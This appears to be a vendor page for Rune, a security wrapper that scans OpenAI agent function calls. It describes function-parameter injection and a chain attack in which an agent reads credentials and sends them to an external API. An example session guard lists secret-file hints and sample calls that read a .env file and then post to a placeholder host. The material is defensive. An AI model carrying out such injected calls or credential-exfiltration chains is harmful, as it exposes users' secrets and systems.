Rune for OpenAI

Secure Every Function Call Your GPT-4 Agent Makes

GPT-4 function calling turns your agent into a tool-using system that executes real actions. Every function call the model generates is an opportunity for attack. Rune wraps your OpenAI client transparently — same API, same types — while scanning every message, function call, and response for threats.

pip install runesec[openai]

from openai import OpenAI
from rune import Shield
from rune.integrations.openai import shield_client

shield = Shield(api_key="rune_live_xxx")
client = shield_client(OpenAI(), shield=shield, agent_id="my-agent")

# Use exactly like a normal OpenAI client
response = client.chat.completions.create(...)

Real-World Attack Scenarios

Function Parameter Injection

A user crafts input that causes GPT-4 to generate a function call with malicious parameters — SQL injection in a database query, path traversal in a file operation, or a shell command in a system tool.

Without Rune: Your code executes the function with the attacker-controlled parameters, leading to a data breach or unauthorized system access.

With Rune: Rune intercepts the function call before execution, detects the malicious parameters, and blocks the call. An alert fires with the full payload for review.

Multi-Function Chain Attack

An attacker triggers a sequence of function calls that are individually benign but together accomplish a malicious goal — read credentials from config, then send them to an external API.

Without Rune: Each function call passes validation individually. The attacker exfiltrates sensitive data through a chain of legitimate-looking operations.

With Rune: Rune tracks function call sequences across the session. The behavioral analysis layer detects the exfiltration pattern and blocks the outbound call.
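
The sequence-level check described in this scenario, sketched as an added example (not Rune's code or API): a per-session guard marks the session as tainted after a sensitive read and refuses any later egress call. The tool names, path hints and sample calls are assumptions made up for the illustration.

```python
import json
from dataclasses import dataclass

# Hypothetical tool names and path hints, assumed for this example only.
SENSITIVE_SOURCES = {"read_file", "get_secret"}
EGRESS_SINKS = {"http_post", "send_email"}
SENSITIVE_PATH_HINTS = (".env", "credentials", "id_rsa", "secrets")


@dataclass
class SessionGuard:
    """Per-session state: blocks egress once a sensitive source was read."""
    tainted_by: str = ""

    def check(self, name, arguments):
        """Return (allowed, reason) for one model-generated tool call."""
        try:
            args = json.loads(arguments)  # arguments arrive as a JSON string
        except json.JSONDecodeError:
            return False, "arguments are not valid JSON"
        if not isinstance(args, dict):
            return False, "arguments must be a JSON object"
        if name in EGRESS_SINKS and self.tainted_by:
            return False, f"egress after sensitive read ({self.tainted_by})"
        if name in SENSITIVE_SOURCES:
            target = str(args.get("path") or args.get("name") or "")
            hit = any(h in target.lower() for h in SENSITIVE_PATH_HINTS)
            if name == "get_secret" or hit:
                self.tainted_by = f"{name}:{target}"
        return True, "ok"


def run_session(calls):
    """Feed (name, arguments) pairs through a fresh guard; return decisions."""
    guard = SessionGuard()
    return [guard.check(name, arguments) for name, arguments in calls]


# Constructed sample: each call looks benign alone, the sequence does not.
SAMPLE_CALLS = [
    ("read_file", '{"path": "docs/README.md"}'),
    ("http_post", '{"url": "https://api.example.com/log", "body": "hi"}'),
    ("read_file", '{"path": "/app/config/.env"}'),
    ("http_post", '{"url": "https://collector.example.net/u", "body": "x"}'),
]

if __name__ == "__main__":
    for (name, _), (ok, why) in zip(SAMPLE_CALLS, run_session(SAMPLE_CALLS)):
        print(f"{name:10s} allowed={ok} reason={why}")
```

The first outbound call is allowed because nothing sensitive has been read yet; the same call is blocked after the `.env` read, which is the difference between per-call validation and session-level tracking.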

How It Works

1. Install the SDK

pip install runesec[openai] — adds the transparent client wrapper for the OpenAI Python SDK.

2. Wrap your client

Wrap your OpenAI client with shield_client(). Same API, same types, same return values. One line of code to add security.

3. Monitor and enforce

Every function call is scanned before execution. View events in the dashboard, configure alerts, and define policies for function-level access control.

Frequently Asked Questions

Does the wrapper change the OpenAI client API?

No. shield_client() returns a drop-in replacement. Same methods, same types, same return values. Your existing code works unchanged.

Does it work with async OpenAI clients?

Yes. Full support for both synchronous and async clients, including streaming responses and function calling.

Can I restrict which functions the model can call?

Yes. Define YAML policies that specify allowed functions, parameter constraints, and rate limits. Rune enforces them on every function call.

Does Rune work with the Assistants API?

Yes. Rune scans tool calls made by Assistants, including code interpreter and file search interactions.

Secure your OpenAI agents today

Add runtime security in under 5 minutes. Free plan includes 10,000 events per month.
